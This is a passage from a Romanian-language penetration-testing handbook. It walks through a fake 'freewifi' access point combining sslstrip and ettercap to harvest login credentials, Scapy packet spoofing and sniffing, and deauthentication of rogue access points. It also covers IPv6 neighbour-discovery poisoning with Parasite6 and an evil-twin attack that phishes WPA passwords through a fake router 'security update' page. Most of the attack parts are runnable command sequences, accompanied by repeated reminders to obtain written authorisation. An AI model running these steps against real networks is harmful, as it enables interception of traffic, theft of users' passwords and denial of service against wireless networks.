„ifconfig at0 192.168.1.1 netmask 255.255.255.0”
și apoi apăsați Enter. Acum trebuie să ajustăm MTU, care înseamnă
unități de transmisie maximă. Ceea ce face MTU este că permite
interfeței noastre tunel să transmită pachete mai mari, astfel încât să putem preveni
fragmentarea pachetelor.
În termeni mai simpli, acest lucru permite punctului nostru de acces fals să gestioneze
volume mai mari de trafic pe Internet, care este generat de oricine se conectează la
punctul nostru de acces fals. În terminal, să tastăm;
„ifconfig at0 mtu 1400”
și apoi apăsați Enter. Acum trebuie să adăugăm o tabelă de rutare, așa că să introducem;
„route add -net 192.168.1.0 netmask 255.255.255.0 GW 192.168.1.1”
și apoi apăsați Enter. Acum trebuie să activăm redirecționarea IP și să creăm niște
reguli pentru tabele IP, astfel încât să putem folosi interfața noastră de tunel pentru a
direcționa traficul între
punctul nostru de acces fals și sursa noastră de internet. Prin urmare, trebuie să tastăm;
„echo 1 > /proc/sys/net/ipv4/ip_forward”
și apoi apăsați Enter. Acum trebuie să introducem regulile noastre pentru tabelele IP, așa că să
introducem;
„iptables -t nat --A PREROUTING -p udp -j DNAT --to 192.168.0.1”
Aici trebuie să introducem adresa IP a gateway-ului pe care am notat-o ​mai devreme,
iar a mea este 192.168.0.1, apoi apăsăm ENTER. Acum trebuie să tastăm;
„iptables -P FORWARD ACCEPT”
Cuvintele, forward și accept are trebuie introduse cu majuscule,
apoi apăsați ENTER. Acum trebuie să tastăm;
„iptables --append FORWARD – în interfață at0 -j ACCEPT”
și apoi apăsați Enter. Acum trebuie să tastăm;
„iptables –table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE”
și apoi apăsați Enter. În cele din urmă, trebuie să tastăm;
„iptables -t nat –A PREROUTING -p tcp –destination-port 80 -j REDIRECT --port 10000”
și apoi apăsați Enter. Acum că ne-am creat regulile iptables, trebuie să
pornim serverul nostru DHCP. Deci, să tastăm;
„dhcpd –cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0”
și apoi apăsați Enter. Apoi tastați;
„/etc/init.d/isc-dhcp-server start”
și apoi apăsați Enter și ar trebui să vedeți acolo că serverul DHCP a pornit
cu succes. Practic, ar trebui să spună:
„[….] Pornirea serverului ISC DHCP: dhcpd”
Acum este timpul să pornești banda SSL, așa că haideți să tastam;
„sslstrip -f -p -k 10000”
și apoi apăsați Enter. Nu în ultimul rând, trebuie să începem editarea aplicației, așa că haideți
să deschidem
un nou terminal, dar să nu închidem terminalul în care rulăm o bandă SSL
. În noul terminal vom introduce;
„ettercap -p -U -T -q -i at0”
și apoi apăsați Enter. Acum că avem SSL strip și ettercap rulând, am
terminat de configurat atacul. Acum putem simula o victimă, astfel încât să putem
folosi punctul nostru de acces fals pentru a captura unele nume de utilizator și parole.
Așa că acum, dacă săriți la computerul victimei, primul lucru pe care îl puteți face
este să vă conectați la punctul de acces fals. Deschideți managerul de rețea și scanați
rețelele wireless din apropiere și ar trebui să vedeți acolo punctul nostru de acces fals
numit „freewifi”.
Continuați și conectați-vă la el și presupunând că am configurat totul corect,
ar trebui să aveți o conexiune la internet. Verificați și vedeți dacă aveți o
adresă IP atribuită din pool-ul DHCP pe care l-am creat înainte.
În exemplul pe care l-am oferit, am creat un server DHCP care poate
atribui adrese IP dispozitivelor conectate și am creat un interval
între 192.168.1.2 și 192.168.1.30 cu comanda
„interval 192.168.1.2 192.168.1.30”
Sub Configurare DHCP. Deci adresa IP a victimei ar trebui să fie în
acest interval. Ca victimă, te poți conecta la pagina ta de Facebook și vei
afla dacă banda SSL funcționează sau nu.
Puteți folosi fie Firefox, fie Google Chrome și veți vedea că fie dacă
încercați să introduceți în browser https://www.facebook .com, acesta va schimba adresa
în www.facebook.com
Asta înseamnă că SSL-ul banda funcționează și dacă te uiți la fila din stânga sus a
browserului, vei observa o pictogramă de lacăt.
Aceasta este o pictogramă pe care banda SSL o plasează acolo pentru a adăuga puțină
legitimitate și acest lucru
împiedică victima să devină prea suspicioasă, deoarece văd această blocare
și a presupus automat că trebuie să fie sigură.
Deci, mergeți mai departe și introduceți un e-mail și o parolă în Facebook. Folosiți
un nume de utilizator și o parolă fictive, cum ar fi „testuser” și utilizați
parola „parola123”.
Nu contează ce nume de utilizator sau parolă folosiți, deoarece dvs. scopul nu este
să vă conectați la facebook, ci faptul că putem captura atât
numele de utilizator, cât și acreditările parolei.
Înainte de a face clic pe conectare, reveniți la mașina atacatorului și haideți să monitorizăm
terminalul ettercap. Acum puteți continua și faceți clic pe autentificare pe Facebook,
iar dacă vă uitați la terminalul ettercap, ar trebui să vedeți datele care vin.
Ar trebui să observați atât numele de utilizator de lângă câmpul „UTILIZATOR”, cât și
parola de lângă „PASS” depus.
Dacă ați încerca exemplul cu un site web bancar online, este foarte
probabil ca numele de utilizator și parola să nu apară în
terminalul ettercap, dar vor apărea în jurnalele SSL strip.
Puteți încerca să vă conectați la conturi și nu veți vedea numele de utilizator și
parola în terminal, dar banda SSL le va prinde și le va plasa într-
un jurnal.
Deci, mergeți mai departe și treceți înapoi la computerul atacatorului și aici
trebuie să deschideți un nou terminal și să tastați;
„cat sslstrip.log”
și apoi apăsați Enter. Acum, ar trebui să vedeți atât numele de utilizator, cât și parola.
Detaliile utilizatorului vor apărea în jurnale ca „userId=username” iar
parola va apărea ca „auth_passwd=parolă”
Acestea sunt toate exemplele pe care am vrut să le împărtășesc cu voi, dar rețineți
că acest atac este extensibil.
De exemplu, există un instrument numit „karma” și ceea ce face este că atunci când un
computer caută o rețea fără fir pentru a se conecta la o
rețea fără fir la care este conectată în trecut, trimite cereri de sondă.
Ei bine, putem crea ceva care ne va permite să acceptăm acele
solicitări de sondă și apoi să falsificăm rețeaua wireless pe care o caută persoana respectivă.
Când va răspunde, ei vor crede că au descoperit că rețeaua wireless
și computerul lor se vor conecta automat. Sunt multe lucruri
pe care le poți face cu asta, dar deocamdată este timpul să treci la următorul atac.
Puteți închide terminalul pe care îl folosim pentru a vizualiza jurnalul de strip SSL. Apoi, pentru
a opri
ettercap, va trebui să apăsați tastele ctrl și C și apoi puteți închide
acel terminal.
Apoi, pentru a opri banda SSL, puteți apăsa ctrl + C pentru a închide terminalul. Pentru a opri
punctul de acces fals, apăsați și ctrl + C în fereastra kali, apoi închideți
terminalul.
Toate acele reguli iptables pe care le-am creat, vor fi
restaurate automat la valorile implicite când reporniți mașina virtuală.
Vă rugăm să vă asigurați că aveți autorizație scrisă înainte de a utiliza SSLstrip,
inclusiv orice variații legate de acest instrument. Dacă exersezi doar în
laboratorul tău de acasă, într-un mediu care nu este de producție, asta nu ar trebui să provoace
probleme
nimănui; totuși, aș sugera să închideți routerul și să exersați cu grijă
fără nicio conexiune la internet.
Capitolul 25 Manipularea pachetelor cu Scapy
Scapy este un instrument avansat de manipulare a pachetelor care nu este recomandat pentru
începători. Cu toate acestea, este corect să menționăm că acest instrument există și
cu siguranță poate acționa ca regele tuturor instrumentelor de hacking.
Scapy vă poate ajuta să creați practic orice pachet doriți, fără
nicio problemă. Imaginați-vă că sunteți pe cale să administrați și să validați o
configurație pe un Firewall, iar una dintre politici dictează să
implementați următoarea regulă:
„Orice pachet inițiat din direcția de intrare în direcția de ieșire nu este
permis, așa că ar trebui refuzat dacă IP-ul de destinație. adresa este aceeași cu
adresa IP sursă.”
Această solicitare de reguli pentru firewall are, desigur, un sens perfect, dar sună și puțin
nerealist. Gândiți-vă doar la modul în care este posibil ca un computer să trimită o solicitare
de la propria adresă IP către direcția de ieșire, unde
adresa IP de destinație ar fi exact aceeași adresă IP identică ca și PC-ul expeditorului.
Asta e imposibil nu?
Ei bine, din punct de vedere tehnic este posibil, deoarece acesta ar putea fi un pachet rău
intenționat.
Cineva ar putea fi pe cale să execute o scanare de porturi în cadrul organizației pentru a obține
date despre dispozitivele de rețea și vulnerabilitățile acestora pentru a lansa un
atac strategic, care ar putea deteriora, dezactiva, clona sau chiar opri întregul
sistem și s-ar părea că a fost provenit din interiorul
rețelei private.
Deci cum este posibil? Ei bine, instrumentul se numește Scapy. Scapy este foarte probabil
cel mai puternic și flexibil instrument de manipulare a pachetelor care este încorporat în Kali
Linux, scris de Phyton.
Folosind Scapy, prin deschiderea interfeței de linie de comandă o putem lansa și
crea un pachet, iar cea mai bună parte este că putem specifica aproape orice:
➢ Orice adresă IP sursă,
➢ Orice adresă IP de destinație,
➢ Tip de serviciu,
➢ Putem creați Adresă IPv4 sau Adresă IPv6,
➢ Schimbați oricare dintre câmpurile de antet,
➢ Schimbați numărul portului de destinație,
➢ Schimbați numărul portului sursă și multe altele.
În plus, pentru a crea un pachet unic, Scapy poate:
➢ Captura orice trafic,
➢ Reda sau reda orice trafic,
➢ Scanează pentru porturi,
➢ Descoperă dispozitive de rețea și multe altele.
Scapy funcționează în Kali Linux și pentru a-l lansa pe interfața de linie de comandă tastând
:
„scapy”
Apoi apăsați Enter. Deoarece există atât de multe posibilități cu scapy, să începem
prin a începe ceva direct și aceasta ar fi o
comandă de trimitere de bază:
„send(IP(src=''10.10.10.20'' ,dst=''10.10.10.2'') /ICPM()/''OurPayload''#)”
Ceea ce înseamnă această comandă de creare de pachete aici este că vreau să trimit un ping
de la adresa IP sursă 10.10.10.20 la adresa IP destinație
10.10.10.2.
În plus, vreau ca acest pachet să arate ca o solicitare ecou ICMP,
dar vreau să includă o sarcină utilă care se numește OurPayload. Scapy este un călcător de
reguli.
Prin urmare, nu trebuie să facem nimic exact așa cum ar trebui să fie conform
protocoalelor de rețea adecvate, ci putem crea pachete care în mod logic
nu ar fi găsite niciodată în rețea.
Trimițând pachete create către mai multe destinații, am putea doar să așteptăm răspunsurile
și să le aruncăm o privire și să vedem dacă am creat un
comportament ciudat și am putea descoperi o vulnerabilitate în acest proces.
Pentru a ieși din Scapy, trebuie să apăsați „Ctrl+d” și asta vă va duce înapoi
la un prompt de comandă normal. Dar, dacă doriți să inițiați o altă comandă,
trebuie să porniți Scapy din nou tastând o comandă;
„scapy”
Apoi apăsați enter. O altă comandă care este foarte periculoasă este atunci când îl
transformăm
pe Scapy pentru a deveni un sniffer. Dacă tastați;
„sniff(iface=''eth0'', prn=lambda x: x.show())”
Apoi apăsați enter, asta înseamnă că vreau să mirosiți tot traficul care trece
prin interfața ethernet0 și vreau să afișați fiecare pachet
pe măsură ce vine și trece prin tine.
După ce apăsați enter, rezultatul va umple probabil această carte; dar am vrut
să vă împărtășesc că Scapy nu numai că este capabil să creeze pachete, dar poate
deveni un intrus sau adulmecător dacă vrem.
În cele din urmă, vă voi cere din nou să vă asigurați că aveți autorizație scrisă
pentru utilizarea Scapy într-un mediu live sau de producție.
Dacă exersezi doar în laboratorul tău de acasă, într-un mediu care nu este de producție,
asta nu ar trebui să provoace probleme nimănui; totuși, aș sugera să închideți
routerul și să exersați cu grijă fără nicio conexiune la internet.
Capitolul 26 Atacul de deautentificare împotriva rogue AP
Există multe tehnici diferite pentru a conține un punct de acces neautorizat într-o
rețea fără fir și în acest scenariu; vom folosi WLC pentru a face asta. Dar
înainte de a ne gândi să conținem un punct de acces necinstiți, mai întâi trebuie să-
l identificăm. Încă o dată, există mai multe moduri de a identifica un
punct de acces necinstiți și am discutat deja despre unele dintre ele, așa că în schimb
imaginați-vă
următorul scenariu.
Imaginați-vă că utilizați un analizor de canal pentru a identifica potențiali interferenți,
într-un mediu în care sunt difuzate mai multe SSID-uri, dar unul dintre
ele folosește o autentificare deschisă, în timp ce restul SSID-uri folosesc toate
WPA2-Enterprise for Security.
Ei bine, este foarte probabil ca, dacă aceasta este o infrastructură corporativă, ceea ce ne-am
uita să fie un punct de acces care este un dispozitiv necinstiți care încearcă să atragă
unii clienți.
Dacă cineva din mediul dvs., fie că este un aeroport sau din
rețeaua dvs. corporativă, dacă emulează sau falsifică SSID-ul dvs. încercând să atragă
oamenii,
este foarte probabil rău intenționat.
În al doilea rând, dacă avem un client care se asociază cu acest punct de acces necinstiți
și începe să-l folosească, atunci atacatorul care are acel punct de acces necinstiți poate acum
să efectueze un atac de tip man-in-the-middle și să asculte cu urechea tot traficul.
Deci, iată ce vom face. Vom folosi un
controler LAN fără fir, de asemenea, referințe ca „WLC”, deoarece WLC știe exact ce
puncte de acces gestionează.
Lucrul bun este că aceste puncte de acces nu stau în mod implicit doar
acolo și își servesc clienții pe canalele lor respective, ci scanează
periodic și celelalte canale, adunând informații pe care le
transmit controlerului LAN fără fir.
O parte din acele informații pe care le adună sunt informații despre punctele de acces pe care
le
văd. Când controlerul LAN fără fir vede un punct de acces pe care nu îl
gestionează, acesta nu face parte din familia controlerului fără fir, va clasifica acel
punct de acces drept „necinstiți”.
Astfel, primul nostru pas în interiorul WLC este să aruncăm o privire și să vedem dacă
controlerul
știe despre vreun punct de acces necinstit, iar după ce găsim acel
punct de acces, vom face următorul pas logic și anume să îl reținem din
controlor.
Pe pagina principală a WLC, pagina „monitor” din colțul din dreapta sus,
ne va arăta detaliile privind punctele de acces necinstiți active sub
„Rezumat necinstiți”
. Dacă utilizați un WLC, este posibil să vedeți mai multe dispozitive listate acolo și să întrebați;
Ei bine
, cum se face că există atât de multe puncte de acces necinstiți? Ar putea exista mai multe
motive pentru aceasta. De exemplu, WLC-ul dvs. ar putea vedea 10 sau chiar mai multe
puncte de acces Rogue și ar putea fi toate complet legeit, doar că WLC-ul dvs.
nu le gestionează, prin urmare le clasifică drept necinstiți.
Toate acele alte SSID-uri difuzate care sunt văzute de unul sau mai multe dintre
acele puncte de acces pe care le gestionează WLC și sunt raportate înapoi controlorului
și de aceea controlerul le pune în categoria de necinstiți.
Pur și simplu nu știe cine sunt acele dispozitive. Pentru a arunca o privire asupra detaliilor
acestor puncte de acces necinstite, facem pur și simplu clic pe linkul „detaliu” și ceea ce vom
vedea
este lista punctelor de acces, inclusiv adresele lor Mac, SSID-urile,
canalul pe care îl folosesc, câte radiourile pe care le folosesc, câți clienți
sunt conectați la ei.
Pentru a afla mai multe despre dispozitiv, putem face clic pe adresa sa Mac și
ne va duce la fereastra „Rouge AP Detail”. Aici, dacă ne uităm la detaliile
acelui punct de acces putem găsi adresa MAC a dispozitivului, prima dată când a fost
văzută de WLC, ultima dată a fost raportată la WLC, iar mai jos,
lângă partea de jos sunt punctele de acces care sunt raportate în primul
rând.
Acolo, putem vedea că AP sau Aps raportează că au văzut
punctul de acces necinstit pe ce canal și includ, de asemenea, informații precum un
indicator de putere a semnalului de recepție și raportul semnal-zgomot.
Acum s-ar putea să întrebați; Ei bine, e grozav și știm că avem un
punct de acces necinstiți, dar cum conținem acel dispozitiv, cum îl închidem
?
Ei bine, ne vom lua punctele de acces care, pe lângă sprijinirea
clienților obișnuiți, și, de asemenea, vom petrece puțin timp suplimentar pe cei care pot
vedea în prezent acel punct de acces necinstiți și vor efectua eficient
un atac de denial of service. împotriva acelui punct de acces.
Va face asta folosind mesaje de „deautentificare”. Acum, dacă un client
încearcă să se asocieze cu acel punct de acces necinstit, deoarece aceste
mesaje de „deautentificare” sunt trimise de punctele de acces, aceste
puncte de acces vor fi, de asemenea, falsificate, ceea ce este un mod frumos de a spune
minciuni despre
adresa MAC implicată. , astfel încât clientul nostru sau orice alți clienți care încearcă
să lucreze cu punctul de acces necinstiți vor fi atacați cu
mesaje de „deautentificare”.
Scopul aici este să ne asigurăm că acel punct de acces nu este gestionat de noi pentru a
ne asigura că niciun client valid nu se asociază cu asta. De asemenea, vreau să subliniez
ceva foarte important în ceea ce privește închiderea sau efectuarea
punctului de acces „atac de autentificare”.
Atacarea propriului punct de acces nu este mare lucru, totuși trebuie să subliniez
că atacarea rețelei locale wireless a altcuiva este o mare problemă
și cu siguranță nu ați dori niciodată să faceți asta împotriva altor
rețele legitime, deoarece va provoca o atac de refuz de serviciu împotriva acelei rețele.
Deci, pentru a face asta, uitându-ne la detaliile AP-ului necinstiți, tot ce trebuie să facem este
să mergem
sub „starea actualizării” și să trecem la „conține” în loc de „alertă”. În continuare,
întrebarea este câte puncte de acces ar trebui să folosim pentru a merge mai departe și a face
față
acestei izolări.
Limitarea poate fi definită sub titlu; „Număr maxim de Aps pentru a
conține necinstiți” Aici, dacă aveți un singur punct de acces care poate
vedea în prezent dispozitivul necinstiți, puteți selecta doar unul pentru a trimite
mesajele de „deautentificare”.
Odată selectat, apoi faceți clic pe „aplicați” pentru a face acea modificare și dă un mic
avertisment;
„Pot exista probleme juridice în urma acestei izolări. Ești sigur că
vrei să continui?”
După cum am subliniat mai devreme, acest lucru ar putea fi ilegal, dar dacă dețineți
punctul de acces, puteți face clic pe „OK”. Acum, un „atac de dezautentificare” va avea loc
împotriva acelui punct de acces necinstiți și va rămâne în vigoare până când îl dezactivăm
.
Dacă sunteți încă pe aceeași pagină, sub „Detalii AP necinstiți” lângă „Stat”,
starea va spune „conținut”, ceea ce dorim să o atingem. Dacă
vrem să o dezactivăm și să renunțăm la atac, pur și simplu vom schimba starea
înapoi la „alerta”, faceți clic pe „aplicați” și atacurile de „deautentificare” vor fi
oprite.
Între timp, dacă aveți un analizor de protocol, puteți vedea
numărul de cadru al punctului de acces necinstiți, iar dacă urmați fluxul, sub „Tip/Subtip”
veți vedea „Deauthentication” care este „atacul de dezautentificare”
cu care am implementat AP-ul folosind WLC-ul nostru împotriva
punctului de acces necinstiți.
Deși se pare că adresa MAC sursă este implicată, acestea sunt
inițiate de propriile noastre puncte de acces pentru a face un atac. Dacă continuați să urmăriți
acel
flux, mergeți mai departe, va continua iar și iar până când vom
opri atacul asupra WLC.
Scopul este de a vă asigura că niciun client valid nu se asociază accidental cu
punctul de acces necinstite sau, dacă o fac, nu vor rămâne acolo foarte mult timp din cauza
mesajelor periodice de „deautentificare” care vin vor
disocia clienții conectați la aceasta.
După cum vedeți, dacă aveți un WLC în organizația dvs., puteți identifica
și conține rapid puncte de acces necinstite. Dar încă o dată aș dori să vă reamintesc
că atacarea rețelei locale fără fir a altcuiva nu este legală și
puteți avea probleme în a o face, așa că asigurați-vă că aveți
autorizația scrisă sau aprobarea managerului dvs. pentru a efectua o astfel de izolare folosind
WLC sau orice alte instrumente.
Capitolul 27 Capturarea pachetelor IPv6 cu Parasite6
Imaginați-vă că aveți o nouă sarcină pentru testarea de penetrare, iar compania
are două rețele care necesită spargerea. Cu toate acestea, unul dintre ele este
foarte probabil ușor, deoarece nu există firewall-uri.
Dar a doua rețea pare că este mai sigură și ar putea dura o
zi întreagă pentru a descoperi posibila volnaribilitate pentru a le exploata. Unii
oameni pot începe cu cel ușor, care ar putea fi făcut în mai puțin de o oră.
Dar, dacă puneți întrebările potrivite implementării actuale a rețelei care
rulează în cadrul companiei, vă puteți salva de dureri suplimentare de cap
și vă puteți bucura de o zi ușoară.
IPv6 rulează ca un protocol valid în majoritatea computerelor din companii de astăzi.
Prin urmare, luând anumiți pași pentru a-l dezactiva, puteți utiliza IPv6
în funcție de funcționarea sa și puteți compromite rețeaua printr-un
atac Man in the Middle.
Dacă știți acest lucru și înțelegeți cum să îl spargeți, este posibil să vă puteți
finaliza testarea de penetrare într-o perioadă scurtă de timp, deoarece compania
poate nu a activat toate caracteristicile de securitate din rețea așa cum
ar trebui să le facă.
Atacul Man in the Middle este realizabil prin multe instrumente și despre unele dintre ele am
discutat
deja anterior. Odată ce ne apropiem de o rețea IPv6,
putem folosi un alt instrument grozav numit „Parasite6”.
Să revenim la elementele de bază și să ne gândim la ce se întâmplă atunci când computerul
pornește prima
dată când este conectat la o rețea. Desigur, computerul va cere mai întâi
o adresă IP.
În acest caz, o adresă IPv6 de la routerul care se află în aceeași rețea sau dacă
există un server DHCP, atunci serverul DHCP va atribui acea adresă IP
acelui computer.
Apoi, dacă acel PC începe să comunice cu rețeaua exterioară sau cu
Internetul, mai întâi ar trebui să învețe adresa Mac a routerului, iar asta s-ar
întâmpla folosind ARP sau Address Resolution Protocol, dar în IPv6 nu există
așa ceva ca ARP.
Ceea ce se întâmplă în rețeaua IPv6 în loc de ARP este că computerul ar folosi un
„Neighbour Discovery”, numit în mod special NDP sau Neighbor Discovery
Protocol.
Ceea ce s-ar întâmpla în continuare este că computerul va trimite o descoperire a vecinului,
pentru a fi mai detaliat, o solicitare a vecinului către routerul său, apoi routerul
va răspunde printr-o reclamă a vecinului.
Solicitarile sunt solicitate, iar publicitatea ofera adresa care a fost
ceruta. Este grozav, dar cum am folosi Parasite6 aici?
Ei bine, ne-am alătura rețelei cu mașina noastră Kali Linux care rulează
Parasite6, apoi am începe să ascultăm rețeaua.
Odată ce Parasite6 este activat, va începe să asculte fiecare mesaj solicitat
care trece prin rețea și apoi va începe să răspundă.
Dar, în loc să răspundem cu detaliile corecte, am răspunde cu
propria noastră adresă Mac tuturor celor din rețea, făcându-i pe fiecare dispozitiv
din rețea să creadă că noi suntem routerul.
Nu avem încă un atac Man in the Middle, în schimb avem un
atac DoS sau Denial of Service, deoarece fiecare dispozitiv de rețea care dorește să intre
pe internet ar ajunge mai întâi la mașina noastră Kali, datorită activării Parasite6
.
Pentru a transforma acest atac DoS într-un atac MITM, ar trebui să pornim
redirecționarea IPv6 pe mașina noastră Kali Linux.
Lansarea Parasite6 pe Kali este simplă, tot ce trebuie să faceți este să tastați comanda
:
„parasite6 interface1 (fake mac address)”
Apoi apăsați enter. În esență, trebuie să tastați parasite6, apoi să specificați ce
interfață doriți să vă conectați la rețea și să deveniți un Man in the
Middle, apoi să introduceți adresa Mac falsă pe care doriți să o furnizați tuturor celorlalte
dispozitive finale sau dispozitive de rețea care sunt conectate la aceeasi retea.
Pentru adresa mac falsă, orice adresă mac inventată ar funcționa bine.
Alte comenzi utile pe care le puteți implementa sunt:
​„parasite6 -l interface1 (falsă adresă Mac) „
De data aceasta am adăugat „–l” și asta ar reprezenta o buclă, adică ar
crea o buclă și ar reîmprospăta mesajul de solicitare la fiecare 5 secunde pentru
a menține actuale informațiile otrăvite. Mai aveți și o altă opțiune
dacă introduceți:
„parasite6 -r interface1 (falsă adresă mac) „
De data aceasta folosind „–r” reprezentând că ar încerca să injecteze și destinația
solicitării. Dar, pentru a le folosi pe amândouă, păstrând
actuale toate informațiile false otrăvite, precum și otrăvind și destinația solicitării
, ar trebui să folosim următoarea comandă:
„parasite6 -lr interface1 (fake mac address)”
În continuare, lansând această comandă , ar asculta toate
mesajele de solicitare a vecinilor pe care le primește și ar începe să le răspundă tuturor cu
adresa sa falsă pe care am specificat-o.
Asigurați-vă că aveți autorizație scrisă înainte de a utiliza Parasite6,
inclusiv orice variații legate de Parasite6, deoarece ar putea cauza un prejudiciu grav
tuturor dispozitivelor de rețea care sunt conectate la rețea.
Dacă exersezi doar în laboratorul tău de acasă, într-un mediu care nu este de producție,
asta nu ar trebui să provoace probleme nimănui; totuși, aș sugera să închideți
routerul și să exersați cu grijă fără nicio conexiune la internet.
Capitolul 28 Evil Twin Deauthentication Attack cu mdk3
În acest capitol vă voi învăța cum să creați un punct de acces evil twin
pe o mașină virtuală Kali Linux. În plus, vă voi arăta cum să
utilizați punctul de acces geamăn rău în combinație cu unele
tehnici de inginerie socială pentru a obține o parolă WPA sau WPA2 pentru ținte.
Pentru a finaliza acest atac, va trebui să aveți un adaptor de rețea USB care
acceptă modul monitor. Dacă nu aveți deja un adaptor de rețea USB
, acesta acceptă modul monitor, am recomandat deja adaptoare de rețea în unele dintre
capitolele anterioare.
De asemenea, dacă înțelegeți deja cum funcționează punctul de acces malefic geamăn, este
bine, dar dacă nu știți, atunci permiteți-mi să vă explic ce vom face pentru
acest atac.
În primul rând, vom crea un punct de acces geamăn rău și se numește geamăn rău
deoarece este o clonă a unui punct de acces autentic. Astfel, găsim o
rețea fără fir pe care dorim să o țintim, copiem acele rețele de identificare a
informațiilor, cum ar fi numele și adresa MAC, apoi folosim acele
informații pentru a crea propria noastră rețea wireless.
Rețineți că acest lucru ar trebui efectuat numai pe rețelele wireless pe care le dețineți
. Dacă nu aveți două rețele wireless, vă sugerez să întrebați un vecin sau
un prieten dacă le puteți folosi pe ale lor pentru a exersa.
Când un client se conectează la rețeaua geamănă, nu va putea
distinge între rețeaua autentică și rețeaua geamănă. Apoi,
când clientul își deschide browserul web, îl vom redirecționa către o
pagină de actualizare de securitate pentru router, care îi va solicita să introducă
parola WPA sau WPA2.
Când clientul își introduce parola WPA, parola va fi
stocată într-o bază de date my SQL, pe care o vom crea în câteva momente. Asta e
tot ce vom face pentru acest atac.
Să mergem înainte și să începem. În primul rând, trebuie să ne conectăm la internet și
vom realiza acest lucru prin partajarea
conexiunii la internet a sistemelor noastre de operare gazdă cu mașina noastră virtuală Kali
Linux. În acest fel, va elimina
necesitatea unui al doilea adaptor de rețea USB. Dacă treceți la
sistemul dvs. de operare gazdă, nu contează ce tip de sistem de operare îl utilizați,
atâta timp cât vă puteți conecta la internet cu acesta.
Continuați și deschideți managerul de rețea și apoi găsiți o rețea wireless
la care să vă conectați. Vă puteți conecta la rețeaua dvs. de acasă, așa că, odată ce ați
terminat, acum
că sunteți conectat la internet pe sistemul dvs. de operare gazdă, trebuie
să o partajăm cu mașina noastră virtuală Kali Linux.
Prin urmare, să ne întoarcem la Kali Linux și în bara de meniu de sus trebuie
să deschidem meniul mașinii virtuale și apoi vom extinde
meniul adaptorului de rețea, iar aici trebuie să setăm adaptorul de rețea pentru
detectarea automată prin punte.
Odată ce ați făcut această setare, puteți continua și permiteți
meniul mașinii virtuale să se restrângă, iar acum putem folosi acel adaptor de rețea virtuală
pentru a
stabili o conexiune la internet prin sistemul nostru de operare gazdă.
Apoi, deschideți managerul de rețea, puteți utiliza orice manager de rețea
aveți, iar în managerul de rețea trebuie să găsiți opțiunea care spune
„rețea cu fir” și apoi faceți clic pe „conectare”.
În timp ce aceasta se conectează, vreau să subliniez că, dacă utilizați
managerul de rețea implicit și aveți probleme cu conexiunea prin cablu, vă
recomand să instalați un alt manager de rețea, cum ar fi „
Manager de rețea WICD”.
Acum că avem o conexiune la internet, trebuie să instalăm un server DHCP
și pentru cei dintre voi care nu știu ce este un server DHCP, ei bine, un
server DHCP este folosit pentru a atribui o adresă IP într-un anumit interval clienților care
se conectează la un punct de acces.
În acest caz, îl vom folosi pentru a atribui o adresă IP oricărei persoane care se conectează la
punctul nostru de acces geamăn. Continuați și închideți managerul de rețea și acum
trebuie să deschidem un terminal și în terminal vom tasta;
„apt-get install dhcp3-server”
și apoi apăsați ENTER. Am instalat deja serverul DHCP, dar este posibil să
primiți o solicitare care vă cere să confirmați instalarea, așa că trebuie doar să tastați „Y”
adică „da”, apoi apăsați Enter și acordați-i un moment pentru a termina instalarea.
Mergând mai departe, trebuie să ne configuram serverul DHCP, așa că în terminal să scriem
; „nano /etc/dhcpd.conf”
și apoi apăsați Enter, și ar trebui să aveți un fișier de configurare dhcp3 gol,
dar dacă nu este gol, pur și simplu ștergeți conținutul existent înainte de a continua.
Odată ce sunteți gata, să începem să introducem configurațiile noastre. Pe prima linie
trebuie să tastăm;
„autoritar”;
și apoi apăsați ENTER pentru a vă deplasa în jos la linia următoare și apoi tastați;
„default-lease-time 600;”
apoi apăsați ENTER și treceți în jos la următoarea linie și tastați;
„max-lease-time 7200;”
și apoi apăsați ENTER pentru a vă deplasa în jos pe o linie și apoi tastați;
„subnet 192.168.1.128 netmask 255.255.255.128 {“
apoi apăsați enter pentru a vă deplasa în jos pe linie și tastați;
„opțiune subnet-mask 255.255.255.128;
apoi apăsați enter pentru a vă deplasa în jos pe linie și tastați;
„opțiunea adresa de difuzare 192.168.1.255;”
și apoi apăsați ENTER pentru a vă deplasa în jos pe o linie și tastați;
„routere opționale 192.168.1.129;”
și apoi apăsați ENTER pentru a vă deplasa în jos pe o linie și tastați;
„opțiune domain-name-servers 8.8.8.8;”
și apoi apăsați ENTER pentru a vă deplasa în jos pe o linie și tastați;
„interval 192.168.1.130 192.168.1.140;”
și apoi apăsați ENTER pentru a vă deplasa în jos pe o linie și tastați;
apoi tastați o paranteză ondulată cu fața în spate;
}
și asta este tot ce trebuie să introducem, așa că acum trebuie să salvăm și să închidem
fișierul. Dar înainte de a face atunci, verificați de două ori că aveți următoarea
configurație în terminal;
autoritar;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.128 netmask 255.255.255.128 {
opțiune subnet-mask 255.255.255.128;
opțiunea de difuzare-adresă 192.168.1.255;
routere opționale 192.168.1.129;
opțiune domain-name-server 8.8.8.8;
gama 192.168.1.130 192.168.1.140;
}
După ce ați verificat că configurația dvs. este corectă, să mergem mai departe și
să salvăm aceste configurații.
Mai întâi vom apăsa împreună tastele „ctrl și X”, apoi vom apăsa
tasta „Y”, iar în final vom apăsa tasta Enter. Acum trebuie să descarcăm
pagina de actualizare de securitate pe care clientul o va vedea când își deschide
browserul web.
Acest exemplu de pagină web imită o actualizare de securitate pentru un router Linksys, dar
într-un
test de penetrare în lumea reală, pagina eșantion pe care o folosesc va fi, cel mai probabil,
irelevantă dacă stiloul dvs. testează o companie care utilizează un portal captiv sau o
pagină de destinație.
De exemplu, ați dori să implementați o pagină web care seamănă cu
portalul captiv al companiei respective. Dacă testați o rețea care utilizează Netgear,
D-link sau Cisco, doriți să creați o pagină web care să se identifice cu acei
producători.
Odată ce ați descărcat fișierul evil twin zip, trebuie să îl dezarhivați.
Odată finalizat, suntem gata să pornim serverul nostru web Apache, care
ne va permite să găzduim pagina noastră web de actualizare de securitate. Acum trebuie să
tastăm;
„/etc/init.d/apache2 start”
și apoi apăsați enter și acum trebuie să pornim My SQL, așa că să introducem;
„/etc/init.d/mysql start”
și apoi apăsați Enter și acum că My SQL rulează, trebuie să ne logăm în el
și să creăm o bază de date unde vom stoca parola WPA pe care
clientul nostru o introduce în securitate actualizați pagina, așa că să introducem;
„mysql –u root”
și apoi apăsați Enter și ar trebui să aveți promptul MySQL. Aici, vom
crea o bază de date numită „geamăn rău”, așa că haideți să scriem;
„creați baza de date evil_twin;”
